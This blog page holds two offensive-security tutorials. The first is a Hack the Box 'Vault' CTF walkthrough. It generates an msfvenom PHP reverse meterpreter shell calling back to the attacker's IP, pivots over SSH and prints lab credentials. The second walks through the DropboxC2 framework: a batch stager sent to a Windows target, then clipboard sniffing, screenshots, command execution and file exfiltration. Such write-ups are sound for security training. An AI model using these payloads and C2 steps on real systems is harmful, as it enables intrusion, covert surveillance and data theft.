Hack the Box Vault: Walkthrough

at 6:55 AM Saturday, April 13, 2019 0 comments
Today we are going to solve another CTF challenge “Vault”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore, they have a static IP. The IP of Curling is 10.10.10.109

Penetrating Methodology

  • Network scanning (Nmap)
  • Surfing the IP address on the browser
  • Surfing directories on the browser
  • Using dirb for directory scanning
  • Creating Payload using msfvenom
  • Getting Meterpreter Session
  • Enumerating through directories
  • Getting SSH login credentials
  • Logging into SSH
  • Pinging Host IP
  • Scanning Ports on Host IP
  • Dynamic Port forwarding with SSH
  • Updating VPN Configuration file
  • Executing Netcat istener
  • Finding user.txt
  • Getting SSh Login Credentials
  • Using proxy command option
  • Escaping restricted shell
  • Using gpg to decrypt root.txt.gpg file
  • Converting file in base64 string using python3m
  • Using echo to decrypt the string
  • Reading our Root Flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -p- -sV -sC 10.10.10.109
As port 80 is running HTTP service, we open the IP address in the web browser.
We thought of opening sparklays in the browser along with the Machines IP. But it turned out to be forbidden.

We don’t find anything on the web page, so we further enumerate the web service using dirb scan.
dirb http://10.10.10.109/sparklays/ -w

From dirb scan we found a useful directory /design/design.html which we opened in the browser. Since the only thing left to do on this Page is to click on Change Logo.

It redirected us on a File Upload Page.

Now we have used msfvenom to generate malicious PHP file.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.13.234 lport=1234 -f raw > shell.php5
We have successfully uploaded the malicious file.
On the other hand, we have setup listening using Metasploit-framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > run
Let’s open our malicious file using the browser.
Finally, we have got the meterpreter.
sysinfo
While looking for our first flag, we have some useful credential for ssh login.
Username- dave
Password- Dav3therav3123
cd Desktop
ls -al
cat Servers
cat key
cat ssh
Time to login into ssh.
Username- dave
Password- Dav3therav3123



We use the ping command to find all the available machines on the subnet “192.168.122.1/255”.
for i in {1..255}; do ping -c 1 192.168.122.$i | grep ‘from’ ; done
Let’s use the following command to scan the ports of 192.168.122.4 to see what we are up against.
Now connect to client machine using the command below.
ssh -D 8080 dave@10.10.10.109
Password- Dav3therav3123
The proxy on the browser is set up to point to socks5://127.0.0.1:8080.
Let’s open the IP 192.168.122.4 in the browser. And see where it directed us. Click on VPN Configuration link.
It directed us to page where we need to update the VPN file. We have found the details in Test VPN link.
Simply we have pasted and modified the details in which we have given the IP address of the Target Machine along with port 1234. Click on update file.
On the other hand, we have executed listening on port 1234.
nc -lvp 1234
We have easily got the root access. Enumerating directories to find user.txt.
cd /root
ls
ls -al
After some digging, we have found our first flag.
ls
cd dave
ls
cat user.txt
Now we thought of reading the logs, we were totally out of hints. While looking at the logs we found something interesting. We saw that firewall is accepting inbound traffic from port 4444/tcp to host 192.168.5.2 which is listening at 987/tcp.
So, to find out, what’s running on 987/tcp. Use the following command.
ncat -p 4444 192.168.5.2 987
It came out be SSH service.
We again found Credentials for SSH Login.
Username- dave
Password- dav3gerous567
cat ssh



What are we waiting for, time to log into SSH, here we again found User.txt.
ssh dave@192.168.122.4
Password- dav3gerous567
ls
cat user.txt
Since dave has a restricted default shell, so we are using proxy command to re-login.
ssh -o ‘Proxycommand ncat -p 4444 %h %p’ -p 987 dave@192.168.5.2
After logging in as user “monitor” we find that we have a restricted shell. We are not able to change the SHELL variable. After spawning a TTY shell, we are able to change the SHELL environment variables.
echo $SHELL
export SHELL=/bin/bash:$SHELL
python
bash
export SHELL=/bin/bash:$SHELL


We tried decrypting the file root.txt.png but couldn’t succeed. Since it requires a secret key.
gpg -d root.txt.gpg
There are not many options left, let’s convert into a base64 encoded string using python3m.
python3m -c “import base64;print(base64.b64encode(open(‘root.txt.gpg’, ‘rb’).read()))”
We have copy & pasted the encoded string to the ubuntu machine and decrypted it. Since we have found the paraphrase ‘itscominghome’ we can easily open the file root.txt.gpg to read our final flag.
Finally, we have read our Final Flag.
gpg -d root.txt.gpg
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing 2.5 Years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here
Labels:

Command and Control with to DropboxC2

at 8:17 PM Thursday, April 11, 2019 0 comments

In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.
Table of Content:
Introduction
Installation
Getting Dropbox API
Exploiting Target
Sniffing Clipboard
Capturing Screenshot
Command Execution
File Download

Introduction                                                                                                                                                           
DBC2 is primarily a tool for post-exploitation. It has an agent running on the target’s machine, a controller, running on any machine, PowerShell modules, and Dropbox servers as a means of communication. It is inspired by the PowerShell Empire Framework. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.
For this particular demonstration,
Attacker: Kali Linux
Target: Windows 10
Installation
To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.
git clone https://github.com/Arno0x/DBC2


After running the above command, we would have a directory created by the name of DBC2. Now, we will traverse inside that directory using the cd command. After that we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.
cd DBC2/
pip install -r requirements.txt


Getting Dropbox API
Now, this tool uses the Dropbox Servers as the medium to run agents on the target machine. In order to do that, this tool requires Dropbox API. To get that, first create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.


This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and 
Generate access token. This will give the Dropbox API required for this particular practical.






Copy the Generated access token, now get to the directory we cloned earlier. Here we have a file named config.py. We will open it using nano command and paste the Access token as the value for “defaultAccessToken” as shown in the given screenshot given below.

Exploiting Target
Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this it will ask for a master password which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add to the config.py file so that it doesn’t ask again for a master password. After this it will create an incoming directory inside the Directory we cloned earlier. This will used as a buffer to save files from the target.
python dropboxC2.py



This tool requires to upload the modules and stager on Dropbox before proceeding further. We will do this using the command given below.
publishStage dbc2_agent.exe


This will upload a file on the Dropbox as shown in the image given below. This file is encrypted using XOR encryption.
Now let’s check if the stage is published using the command given below:
listPublishedStage


Now that stage is uploaded, let’s use it to create a stager. We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in macro, oneliner, JavaScript, MS build sct and much more. This command will create a stager.bat in tmp directory. We sent this bat file to our target machine.
genStager batch default


After the batch file is executed on the target machine, we will be informed with a message on the terminal that Agent found with ID. Now we will use the list command to see the list of the agents. And then we will copy the AgentID and then use it to interact with the session as shown in the given image.
list
use [AgentID]


This will create a file on the Dropbox with the .status extension as shown in the given image.


Clipboard Sniffing
We can get the clipboard data that the target has on its clipboard. That is., the data he/she has copied. To do this we will have to start a sniffer using the command clipboardLogger start. Then wait till the target copies some data. Then Stop the sniffer using the command clipboardLogger stop. After stopping the sniffer the clipboard will be saved in a text file inside the incoming directory.
clipboardLogger start
clipboardLogger stop


Let’s take a look at what target copied on his/her machine. We are going to use the cat command on a new Kali terminal to read the file as shown in the give image.
cat /root/DBC2/incoming/clipboardlogger.txt


Capturing Screenshot
Now further more we can grab a screenshot of then target machine. To do this we will use the screenshot command as show in the given image.
screenshot


The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.


Command Execution
We can run some PowerShell commands on the target machine using the parameter cmd. This tool doesn’t offer the shell but it can execute one command at a time. So, we type cmd and then it asks the command that is to be executed. Here we run the command dir. And we have the list of files as shown in the given image.
cmd
dir

File Download
Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.
getFile sharetext.txt


The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.
cat /root/DBC2/incoming/sharetext.txt


Labels:
Subscribe to: Posts (Atom)